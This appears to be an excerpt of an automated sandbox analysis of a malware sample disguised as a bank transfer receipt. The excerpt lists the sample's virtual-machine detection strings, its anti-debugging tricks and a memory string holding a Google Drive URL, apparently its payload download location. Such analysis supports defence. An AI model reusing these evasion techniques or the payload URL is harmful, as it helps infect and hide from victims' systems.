Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004088C0 rdtsc 15_2_004088C0
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Window / User API: threadDelayed 581 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F3532F GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00F3532F
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00F321E7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe System information queried: ModuleInformation Jump to behavior
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeows
Source: explorer.exe, 00000015.00000000.735601007.000000000EEA7000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00F32DAE
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004088C0 rdtsc 15_2_004088C0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA8E06 mov eax, dword ptr fs:[00000030h] 1_2_02AA8E06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAB126 mov eax, dword ptr fs:[00000030h] 1_2_02AAB126
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAC112 mov eax, dword ptr fs:[00000030h] 1_2_02AAC112
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAAB56 mov eax, dword ptr fs:[00000030h] 1_2_02AAAB56
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h] 15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h] 15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h] 15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h] 15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h] 15_2_1EAC52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB446A7 mov eax, dword ptr fs:[00000030h] 15_2_1EB446A7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h] 15_2_1EADAAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h] 15_2_1EADAAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFFAB0 mov eax, dword ptr fs:[00000030h] 15_2_1EAFFAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5FE87 mov eax, dword ptr fs:[00000030h] 15_2_1EB5FE87
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h] 15_2_1EAFD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h] 15_2_1EAFD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2AE4 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2AE4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF16E0 mov ecx, dword ptr fs:[00000030h] 15_2_1EAF16E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD76E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAD76E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF36CC mov eax, dword ptr fs:[00000030h] 15_2_1EAF36CC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2ACB mov eax, dword ptr fs:[00000030h] 15_2_1EAF2ACB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98ED6 mov eax, dword ptr fs:[00000030h] 15_2_1EB98ED6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7FEC0 mov eax, dword ptr fs:[00000030h] 15_2_1EB7FEC0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB08EC7 mov eax, dword ptr fs:[00000030h] 15_2_1EB08EC7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7FE3F mov eax, dword ptr fs:[00000030h] 15_2_1EB7FE3F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACE620 mov eax, dword ptr fs:[00000030h] 15_2_1EACE620
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h] 15_2_1EB04A2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h] 15_2_1EB04A2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD8A0A mov eax, dword ptr fs:[00000030h] 15_2_1EAD8A0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h] 15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h] 15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h] 15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF8E00 mov eax, dword ptr fs:[00000030h] 15_2_1EAF8E00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81608 mov eax, dword ptr fs:[00000030h] 15_2_1EB81608
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE3A1C mov eax, dword ptr fs:[00000030h] 15_2_1EAE3A1C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h] 15_2_1EAFA61C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h] 15_2_1EAFA61C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h] 15_2_1EACAA16
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h] 15_2_1EACAA16
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov ecx, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD766D mov eax, dword ptr fs:[00000030h] 15_2_1EAD766D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0927A mov eax, dword ptr fs:[00000030h] 15_2_1EB0927A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h] 15_2_1EB7B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h] 15_2_1EB7B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98A62 mov eax, dword ptr fs:[00000030h] 15_2_1EB98A62
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB54257 mov eax, dword ptr fs:[00000030h] 15_2_1EB54257
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8EA55 mov eax, dword ptr fs:[00000030h] 15_2_1EB8EA55
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h] 15_2_1EB8AE44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h] 15_2_1EB8AE44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h] 15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h] 15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h] 15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB95BA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB95BA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h] 15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h] 15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h] 15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h] 15_2_1EAD1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h] 15_2_1EAD1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8138A mov eax, dword ptr fs:[00000030h] 15_2_1EB8138A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7D380 mov ecx, dword ptr fs:[00000030h] 15_2_1EB7D380
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2397 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2397
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD8794 mov eax, dword ptr fs:[00000030h] 15_2_1EAD8794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFB390 mov eax, dword ptr fs:[00000030h] 15_2_1EAFB390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB037F5 mov eax, dword ptr fs:[00000030h] 15_2_1EB037F5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEDBE9 mov eax, dword ptr fs:[00000030h] 15_2_1EAEDBE9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h] 15_2_1EB453CA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h] 15_2_1EB453CA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h] 15_2_1EAC4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h] 15_2_1EAC4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFE730 mov eax, dword ptr fs:[00000030h] 15_2_1EAFE730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h] 15_2_1EAFA70E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h] 15_2_1EAFA70E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8131B mov eax, dword ptr fs:[00000030h] 15_2_1EB8131B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h] 15_2_1EB5FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h] 15_2_1EB5FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h] 15_2_1EB9070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h] 15_2_1EB9070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEF716 mov eax, dword ptr fs:[00000030h] 15_2_1EAEF716
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACDB60 mov ecx, dword ptr fs:[00000030h] 15_2_1EACDB60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADFF60 mov eax, dword ptr fs:[00000030h] 15_2_1EADFF60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98F6A mov eax, dword ptr fs:[00000030h] 15_2_1EB98F6A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h] 15_2_1EAF3B7A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h] 15_2_1EAF3B7A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98B58 mov eax, dword ptr fs:[00000030h] 15_2_1EB98B58
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACDB40 mov eax, dword ptr fs:[00000030h] 15_2_1EACDB40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADEF40 mov eax, dword ptr fs:[00000030h] 15_2_1EADEF40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACF358 mov eax, dword ptr fs:[00000030h] 15_2_1EACF358
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFF0BF mov ecx, dword ptr fs:[00000030h] 15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h] 15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h] 15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB090AF mov eax, dword ptr fs:[00000030h] 15_2_1EB090AF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9080 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9080
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h] 15_2_1EB43884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h] 15_2_1EB43884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD849B mov eax, dword ptr fs:[00000030h] 15_2_1EAD849B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC58EC mov eax, dword ptr fs:[00000030h] 15_2_1EAC58EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB814FB mov eax, dword ptr fs:[00000030h] 15_2_1EB814FB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h] 15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h] 15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h] 15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
